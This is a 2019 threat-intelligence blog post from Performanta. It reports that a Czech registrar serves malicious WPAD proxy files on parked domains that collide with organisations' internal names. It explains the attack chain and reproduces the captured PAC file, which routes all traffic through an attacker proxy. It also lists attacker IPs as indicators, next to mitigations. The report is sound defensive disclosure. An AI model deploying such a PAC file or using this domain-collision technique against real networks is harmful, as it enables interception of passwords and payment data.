February 19, 2019 by Nick Griffin

Performanta has uncovered widespread abuse by a Czech registrar named Gransy s.r.o. resulting in a mass scale attack on organisations through the Web Proxy Auto-Discovery Protocol (WPAD). The attack causes all HTTP(S)-based traffic to be routed through the attacker’s server, giving the attacker visibility over sensitive information like passwords and credit card details.

Web Proxy Auto-Discovery Protocol (WPAD)

WPAD is a scheme used by operating systems to automatically configure web (i.e. HTTP and HTTPS) proxy settings. The feature is turned on in Windows operating systems by default, which poses a potentially dangerous situation.

The auto-discovery mechanism of WPAD will attempt to find a “wpad.dat” configuration file on the current network. It will first attempt to retrieve a web URL to the file through DHCP. If not provided by DHCP, it will subsequently attempt to download it from the internal domain over HTTP. The following is the order of URLs it will attempt to download the file from:

1. http://wpad.department.branch.domain.tld/wpad.dat
2. http://wpad.branch.domain.tld/wpad.dat
3. http://wpad.domain.tld/wpad.dat

If a valid “wpad.dat” PAC file is found, the proxy settings of the machine are configured. Usually this is not a problem. However, consider the following scenario:

  • An organisation uses “mydomain.com” as their internal domain name but does not own “mydomain.com” publicly
  • An attacker registers “mydomain.com” publicly
  • Machines inside the organisation that reside on the internal “mydomain.com” are moved to another network and begin using an internal DNS server that is not authoritative for “mydomain.com”.
  • Machines attempt to resolve “wpad.mydomain.com” via DNS and these requests are sent to the attacker’s nameservers.
  • Attacker responds to DNS request for “wpad.mydomain.com” with attacker-controlled IP address
  • Machines attempt to connect to attacker’s IP over HTTP and request “wpad.mydomain.com/wpad.dat”
  • Attacker responds with malicious “wpad.dat” file, specifying that all traffic should be routed through the attacker’s network infrastructure
  • Machines configure operating system proxy settings to route all HTTP and HTTPS traffic through attacker’s server

This is clearly a problem. In fact, US-CERT specifically warned people of this back in 2016.

It is worth noting, however, that to snoop on HTTPS traffic the attacker would need to man-in-the-middle (MITM) TLS connections by presenting their own certificate. This would typically result in browser client warnings, but users often manually override this.

Gransy s.r.o.

Since mid-2017, we have been monitoring a nefarious Czech registrar called Gransy s.r.o. which we have associated with malicious WPAD activity. This registrar has many subsidiaries and domain names, such as “subreg.cz”, “parktons.com”, “regtons.com”, and “NEROSO Inst.”.

Gransy has been registering expired domain names and parking them for many years. Whilst this is not unusual in itself, these domains have been responding to WPAD subdomains and serving malicious WPAD files since at least July 2017. Many of the domains they have purchased are used internally by organisations who have failed to maintain ownership of the domain publicly. As such, domain collisions have occurred where, resulting in organisational HTTP(S) traffic being redirected through a Gransy-owned IP address. We can see no legitimate reason why this registrar’s domain parking platform would be serving WPAD files except to purposely and illegally spy on traffic through domain collisions.

An example of WPAD abuse by this registrar can be found on the URL below, which is still live as of February 13, 2019. This domain appears likely to have been previously been owned by Silk Way Bank (now Premium Bank) in Azerbaijan.

hxxp://wpad.swbank.az/wpad.dat

More generically, this WPAD file can be obtained from the following URLs:

hxxp://159.253.25.197/wpad.dat
hxxp://159.253.28.197/wpad.dat
hxxp://31.192.228.197/wpad.dat

The content of the WPAD file has been preserved below.

function FindProxyForURL(url, host) {
 return 'PROXY 185.82.212.95:8080; DIRECT';
}

Performanta have reported this registrar for abuse to ICANN and will continue to monitor.

Mitigations

To prevent WPAD abuse that use both this and other techniques, the following mitigations are highly advised:

  • Turn off WPAD throughout your organisation unless strictly necessary
  • Ensure that any internal domain names, that are also valid public domain names, are owned by your organisation publicly and kept under your ownership
  • Change your internal domain names to use TLDs reserved by ICANN for non-public use, such as “.corp” or “.local”

For this particular attack, we also recommend blocking the IPs listed in the “Indicators of Compromise” below.

Indicators of Compromise (IOCs)

Parktons IPs

Blocking these IPs will help to prevent malicious WPAD files from being downloaded. If you see these IPs in your environment, it does not necessarily mean that you are impacted however, unless communication with these IPs was to a WPAD subdomain.

159.253.25.197
159.253.28.197
31.192.228.197

Gransy Proxy

This IP:Port is associated with malicious activity.

185.82.212.95:8080

Performanta


Privacy Policy

© 2019 Performanta. All Rights Reserved.